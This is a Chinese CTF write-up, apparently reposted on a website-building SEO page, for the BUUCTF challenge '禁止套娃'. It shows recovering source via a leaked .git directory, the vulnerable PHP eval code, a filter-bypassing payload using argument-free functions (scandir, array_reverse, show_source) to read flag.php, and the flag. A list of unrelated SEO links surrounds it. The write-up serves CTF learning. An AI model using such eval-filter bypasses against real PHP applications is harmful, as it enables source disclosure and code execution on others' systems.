当前位置: 首页 > wzjs >正文

怎么做属于自己的网站wordpress判断使用不同模板

怎么做属于自己的网站,wordpress判断使用不同模板,做的差的网站,重庆sem网站推广BUUCTF——禁止套娃 进入靶场 一个近乎空白的页面 看一下框架 没什么有用的信息&#xff0c;扫个目录吧 只扫出来给flag.php&#xff0c;但是0B&#xff0c;估计又是个空网站 拼接访问一下 果然又是什么都没有 没有突破口 githack找找看看也没有源码吧 <?php include …

BUUCTF——禁止套娃

进入靶场

在这里插入图片描述

一个近乎空白的页面

看一下框架

在这里插入图片描述

没什么有用的信息,扫个目录吧

在这里插入图片描述

只扫出来给flag.php,但是0B,估计又是个空网站

拼接访问一下

在这里插入图片描述

果然又是什么都没有

没有突破口

githack找找看看也没有源码吧

在这里插入图片描述

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){ //get传参expif (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {//过滤伪协议if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {//过滤关键字// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");}}else{die("再好好想想!");}}else{die("还想读flag,臭弟弟!");}
}
// highlight_file(__FILE__);
?>

根据这段代码构造payload

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

在这里插入图片描述

拿到flag

flag{510faf28-0e0f-400d-aa4d-c88c74df6cde}

下播!

在这里插入图片描述

http://www.dtcms.com/wzjs/784765.html

相关文章:

  • 一六八互联网站建设音乐网站建设教程视频教程
  • 长沙网站排名kol合作推广
  • 做阿里巴巴好还是网站好百度首页网址是多少
  • 沈阳网站建设服务平台新媒体广告代理加盟
  • 辽宁省高等级公路建设局网站手机网站dedecms
  • 密山网站西安企业门户网站建设
  • 制作企业网站的南宁网站建设价格
  • 商务网站开发的基本原则wordpress怎样发邮件
  • 有关做美食的网站乐餐饮网站建设网站
  • 佛山搜索引擎推广服务好成都网站优化平台
  • 手机网站建设西安长沙建网站速成班
  • 深圳有多少网站建设公司网页设计与网站建设试卷
  • 手表网站起名常见的网站开发语言
  • 做创业网站赚钱谷歌seo最好的公司
  • 厦门网站建设建设公司做网站都用什么软件
  • 星空传媒有限公司网站外贸免费建设网站制作
  • 番禺网站建设服务怎么提升网站流量
  • 工程中标公示查询怎么查网络优化工程师能干一辈子吗
  • 阜阳专业网站建设wordpress虚拟主机
  • 三创大赛网站建设徐州网站建设费用
  • 网站建设成功案例书籍景区网站开发
  • 石家庄网站建设电商网站开发使用的工具
  • 网站建设程序开发过程上海 高端 网站建设
  • 集团制度建设网站辽宁建设工程信息网官网 项目经理解锁表格
  • 软文推广平台东莞seo推广优化排名
  • 网站外链建设需要逐步进行适可优化即可地域名网址查询
  • 东营网站建设培训学校外包加工拿货网
  • 奉化建设网站湖北随州市城乡建设官方网站
  • 招商网站建设运营微商做百度推广发哪个网站收录高
  • 免费建站免费网站网站栅格布局